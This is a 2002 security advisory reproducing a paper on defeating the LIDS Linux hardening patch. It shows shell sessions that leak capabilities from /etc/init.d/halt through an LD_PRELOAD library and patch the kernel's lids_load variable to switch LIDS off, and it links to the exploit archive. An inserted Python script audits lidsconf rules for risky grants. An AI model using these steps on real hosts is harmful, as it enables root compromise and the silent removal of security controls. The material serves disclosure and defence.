


LIDS misconceptions leads to local root compromise



15th Jan 2002 [SBWID-4997]
COMMAND

	LIDS misconceptions leads to local root compromise

SYSTEMS AFFECTED

	lids 1.1.0pre6-2.4.14

PROBLEM

	In stealth's <stealth@segfault.net> paper
	[http://stealth.7350.org/lids-hack.tgz]:
	

	

	--[ Introduction

	

	

	LIDS was developed to protect systems from malicious roots which may
	creep in via various system holes such as bugs in wu-ftpd etc. In the
	absence of "real protection" the LIDS developers felt that they needed
	to create some sort of sandbox so that evil attackers who gained root
	access to the host would not be able to replace important system files
	such as /bin/login. They should also not be able to kill important
	processes such as httpd or to modify the system logs.
	    I will show step by step that LIDS not only fails to protect the
	system from attackers but is also a security hole in itself which
	allows users to gain root access in certain configurations. Further,
	LIDS may be abused as a rootkit for hiding files or processes.
	

	

	--[ 1. How to determine you are LIDS'ed

	

	

	Let's assume that we already gained root on our testbox. This is not
	very difficult as a lot of local root holes exist in almost all Linux
	distributions. Choose one of the kernel bugs, crontab, modprobe or
	sperl :-). LIDS will not hinder users from gaining uid 0. LIDS was
	only designed to put restrictions on the user with uid 0 (root).
	

	linux:~ # ls -la /proc/sys/lids/locks
	-rw-------    1 root     root            0 Dec 31 21:22 /proc/sys/lids/locks
	linux:~ # touch /sbin/x
	touch: creating `/sbin/x': Operation not permitted
	linux:~ #

	

	OK. This is easy. The system is LIDSed. Obviously the administrator put
	a READONLY rule on the /sbin directory.
	

	Finding out which configuration the LIDS box has is already the hardest
	part. We may do that with brute force. I wrote a tool called "capscan"
	which tells you which restrictions apply to you.
	

	

	--[ What did they do with root?

	

	

	linux:~ # cd /tmp/lids/
	linux:/tmp/lids # ./capscan -b
	b 0 CAP_CHOWN
	b 5 CAP_KILL
	b 6 CAP_SETGID
	b 7 CAP_SETUID
	b 23 CAP_SYS_NICE
	b 27 CAP_MKNOD
	linux:/tmp/lids #

	

	

	Aha. Capscan brute-forced the most important capabilities for us. We
	need to brute-force (i.e. try chown(), try create_module(), try
	chroot(), ...) because LIDS does not use the Linux kernel's capability
	bits inside the task struct, so we can't obtain them via capget().
	

	To better understand which restrictions are placed  on  the  system,  we
	will have a look at the configuration:
	

	linux:~ # lidsconf -L
	LIST
	                Subject   ACCESS(inherit)        time        Object
	-----------------------------------------------------
	        Any file  READONLY(domain):  0  0000-0000                  /etc
	        Any file  READONLY(domain):  0  0000-0000                 /sbin
	        Any file  READONLY(domain):  0  0000-0000                  /bin
	        Any file  READONLY(domain):  0  0000-0000                  /usr
	        Any file  READONLY(domain):  0  0000-0000                  /lib
	        Any file      DENY(domain):  0  0000-0000             /etc/lids
	        Any file      DENY(domain):  0  0000-0000           /etc/shadow
	        Any file    APPEND(domain):  0  0000-0000              /var/log
	      /bin/login  READONLY(domain):  0  0000-0000           /etc/shadow
	         /bin/su  READONLY(domain):  0  0000-0000           /etc/shadow
	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN
	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN
	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN
	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN
	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_RAWIO
	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_INIT_KILL
	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_INIT_KILL
	      /bin/login     GRANT(domain):  0  0000-0000         CAP_SYS_ADMIN
	      /bin/login     GRANT(domain):  0  0000-0000         CAP_NET_ADMIN
	        Any file  READONLY(domain):  0  0000-0000                 /boot

	

	

	The attacker is not able to issue the "lidsconf -L" command. This
	command was issued from a LIDS-free session, which root may enter by
	giving the correct password. The attacker does not know the password,
	so we have to look for some other way. Almost all systems will have
	CAP_SYS_ADMIN placed on the bootup and the shutdown scripts, otherwise
	you won't be able to mount your disk etc. CAP_NET_ADMIN is needed too
	to configure your network, and CAP_SYS_RAWIO is needed by some
	programs. I took this config more or less from the examples shipped
	with LIDS. As you see, appropriate system directories are protected
	etc. For our purposes it does not matter which directories we can
	modify or not, so do not get stuck on this. The inherit level tells
	LIDS how many fork()s within the program are allowed and still have
	the same capability granted. /etc/init.d/rc for example is a shell
	script and forks off a lot of commands such as 'ifconfig' etc., and
	thus it needs to have a certain inheritance level. Usually you'd use
	-1 (-1 means unlimited inheritance) here, but I never got it working
	with -1 (bug?) and so I used 1000.
	

	 

	--[ Gimme your CAPs, please!

	

	

	The following seems really trivial, but LIDS is just leaking
	capabilities bound to certain programs, such as /etc/init.d/halt in
	this example. The "x" shell script will create a shared object
	/tmp/boom.so which forks a shell. Nothing special. When executing the
	/etc/init.d/halt script we preload this shared object and obtain the
	shell from it. Let's go...
	

	linux:/tmp/lids # ./x
	OK
	linux:/tmp/lids # LD_PRELOAD=/tmp/boom.so /etc/init.d/halt
	linux:/tmp/lids # ./capscan -b
	b 0 CAP_CHOWN
	b 5 CAP_KILL
	b 6 CAP_SETGID
	b 7 CAP_SETUID
	b 12 CAP_NET_ADMIN
	b 17 CAP_SYS_RAWIO
	b 21 CAP_SYS_ADMIN
	b 23 CAP_SYS_NICE
	b 27 CAP_MKNOD
	linux:/tmp/lids #

	

	

	We obtained CAP_SYS_ADMIN, CAP_SYS_RAWIO and CAP_NET_ADMIN from the
	halt script. It could not be easier. This will also work with the
	setuid capability granted to xinetd, for example. Users may gain root
	with the help of LIDS!!! The inherit level does not come into play
	here; even 0 would work fine for giving users a root shell.
	

	Let me sum up what happened up to here: capabilities such as
	CAP_SYS_RAWIO are leaking ("inherited") to any subprocess if an
	appropriate inherit level was placed on the file. We may gain these
	capabilities via preloading shared objects or by setting the $PATH
	variable if the file is actually a shell script. Even if the inherit
	level is 0, i.e. the capability is not inherited across fork(), the
	LD_PRELOAD trick still works. That is because preloading does not
	create subprocesses, and inside our preloaded library we may call
	setuid(0) if CAP_SETUID was granted. The executed shell will then be a
	root shell.
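	An audit of the "lidsconf -L" listing shown earlier, added here as an editor's example (it is not part of stealth's paper or the lids-hack archive): it parses the rule table and flags every GRANT of a capability that, once leaked through the granted program's environment as just described, lets an attacker disable LIDS or take over the box. The sample listing is copied from the paper; the file contents used to tell scripts from binaries are constructed.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional

# Capabilities that let the holder switch LIDS off or bypass it outright
# (CAP_SYS_RAWIO is what lidsoff used to zero lids_load in kernel memory).
CRITICAL_CAPS = {"CAP_SYS_RAWIO", "CAP_SYS_MODULE", "CAP_SYS_PTRACE"}
# Capabilities that hand over broad control of the box once leaked.
HIGH_CAPS = {"CAP_SYS_ADMIN", "CAP_NET_ADMIN", "CAP_SETUID", "CAP_SETGID",
             "CAP_INIT_KILL"}

# One rule line of `lidsconf -L`: Subject ACCESS(scope):inherit time Object
RULE_RE = re.compile(
    r"^\s*(?P<subject>.+?)\s+(?P<access>[A-Z]+)\((?P<scope>\w+)\):\s*"
    r"(?P<inherit>-?\d+)\s+(?P<time>\d{4}-\d{4})\s+(?P<object>\S+)\s*$")

@dataclass
class Finding:
    subject: str
    cap: str
    inherit: int
    is_script: Optional[bool]  # None when the subject could not be read
    severity: str

def parse_rules(listing: str) -> List[dict]:
    """Return the rule lines as dicts; header and separator lines are skipped."""
    return [m.groupdict() for m in map(RULE_RE.match, listing.splitlines()) if m]

def read_head(path: str) -> Optional[bytes]:
    """Read the first bytes of a subject on the audited host (None if unreadable)."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2)
    except OSError:
        return None

def audit(listing: str,
          head: Callable[[str], Optional[bytes]] = read_head) -> List[Finding]:
    """Flag every GRANT of a critical or high capability. The inherit level is
    reported but never lowers severity: the paper shows LD_PRELOAD leaks the
    capability even at inherit 0. A shebang subject also leaks via $PATH."""
    findings = []
    for r in parse_rules(listing):
        if r["access"] != "GRANT":
            continue
        cap = r["object"]
        sev = "critical" if cap in CRITICAL_CAPS else "high" if cap in HIGH_CAPS else None
        if sev is None:
            continue
        h = head(r["subject"])
        findings.append(Finding(r["subject"], cap, int(r["inherit"]),
                                None if h is None else h.startswith(b"#!"), sev))
    return findings

# Rule listing copied from the paper (non-GRANT lines trimmed to one).
LISTING = """\
LIST
                Subject   ACCESS(inherit)        time        Object
-----------------------------------------------------
        Any file      DENY(domain):  0  0000-0000             /etc/lids
/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN
  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN
  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN
/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN
/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_RAWIO
/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_INIT_KILL
  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_INIT_KILL
      /bin/login     GRANT(domain):  0  0000-0000         CAP_SYS_ADMIN
      /bin/login     GRANT(domain):  0  0000-0000         CAP_NET_ADMIN
"""

# Constructed file heads so the example runs without the audited host.
FAKE_HEADS = {"/etc/init.d/halt": b"#!/bin/sh\n", "/etc/init.d/rc": b"#!/bin/sh\n",
              "/bin/login": b"\x7fELF"}

if __name__ == "__main__":
    for f in audit(LISTING, FAKE_HEADS.get):
        kind = {True: "script", False: "binary", None: "unknown"}[f.is_script]
        print(f"{f.severity:8} {f.subject:17} {f.cap:14} inherit={f.inherit:<5} {kind}")
```

	On a real LIDS host, call audit() with the output of "lidsconf -L" from a LIDS-free session and the default read_head, so script detection reads the actual subjects.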
	

	LIDS however is still in the kernel and protects /sbin and other
	directories from tampering. So let's continue:
	

	linux:/tmp/lids # cc lidsoff.c -o l
	linux:/tmp/lids # grep lids /proc/ksyms
	c02a2120 lids_load_Ra57ab5ad
	c0120a10 lids_cap_log_R0d747633
	c011e088 lids_cap_time_checker_R9f27daab
	c02a2124 lids_local_on_R641824fe
	c02a212c lids_local_pid_R2a2dd337
	c011dfb0 lids_local_off_R445f75c1
	linux:/tmp/lids # touch /sbin/x
	touch: creating `/sbin/x': Operation not permitted
	linux:/tmp/lids # ls -la /etc/lids
	ls: /etc/lids: No such file or directory
	linux:/tmp/lids # ./l
	Usage: ./l <addr-of-lids_local_on-in-hex>

	linux:/data5/cvs-work/lids # ./l c02a2124
	# Patching [c02a2120]
	1 -> 0
	disabled global LIDS protection

	linux:/tmp/lids # ls -la /etc/lids
	total 32
	drwxr-xr-x    2 root     root         4096 Dec 31 15:23 .
	drwxr-xr-x   52 root     root         8192 Dec 31 19:12 ..
	-rw-r--r--    1 root     root         6760 Dec 30 21:11 lids.cap
	-rw-r--r--    1 root     root          987 Dec 31 15:48 lids.conf
	-rw-r--r--    1 root     root          970 Dec 30 21:11 lids.net
	-rw-r--r--    1 root     root           40 Dec 30 21:23 lids.pw
	linux:/tmp/lids # touch /sbin/x
	linux:/tmp/lids # ./capscan -b
	b 0 CAP_CHOWN
	b 5 CAP_KILL
	b 6 CAP_SETGID
	b 7 CAP_SETUID
	b 10 CAP_NET_BIND_SERVICE
	b 12 CAP_NET_ADMIN
	b 16 CAP_SYS_MODULE
	b 17 CAP_SYS_RAWIO
	b 18 CAP_SYS_CHROOT
	b 19 CAP_SYS_PTRACE
	b 21 CAP_SYS_ADMIN
	b 23 CAP_SYS_NICE
	b 27 CAP_MKNOD
	linux:/tmp/lids #

	

	"lidsoff" is just patching the "lids_load" variable in the kernel to 0.
	LIDS won't check any actions anymore then. This is possible because
	/etc/init.d/halt was leaking the CAP_SYS_RAWIO capability to us.
	Capscan shows that we got all important capabilities (capscan does not
	try some capabilities such as CAP_SYS_REBOOT etc. :-) We are done! The
	"1 -> 0" tells you that LIDS is disabled.
	

	

	--[ Discussion

	

	You may be surprised how easy it was to disable LIDS. There are other
	ways to do it. One may hijack a LIDS-free session by using a simple TTY
	hijacker. Commands may easily be inserted into the administrator's
	terminal. I don't like the idea of sandboxing root; there is too much
	that may be overlooked and which is not fixable that easily. One thing
	is that they still share the same homedir. Even if you can make it
	read-only, I don't feel comfortable with it. Rather, I like systems
	with ACLs which may be applied to files and a capability system where
	root is still root but programs such as "passwd" or "ssh" don't have
	setuid root but appropriate capabilities. SELinux is a much better
	approach for this, even if I hope that .gov extensions will never make
	it into the Linux kernel. Putting a portscan detector into the Linux
	kernel is probably also a bad idea. As little code as possible in
	critical parts of the system!
	    Once an attacker has broken your LIDS system, he does not even
	need to install a rootkit; LIDS is one. It allows for hiding files and
	processes, and once the attacker has changed the LIDS password, the
	administrator has lost his machine.
	 

	

	--[ Links

	

	

	[LIDS] http://www.lids.org
	LIDS system, FAQs and documentation for LIDS.
	I tried version lids-1.1.0pre6-2.4.14.

	[capscan] http://stealth.7350.org/lids-hack.tgz
	This paper with the programs described herein.

	[SELinux] http://www.nsa.gov/selinux
	SEcure Linux. One more toy to play with at home.

	

	

	Exploit :
	========

	The exploit archive lids-hack.zip (the paper together with the programs
	it describes) is available at http://stealth.7350.org/lids-hack.tgz.


SOLUTION

	Not yet

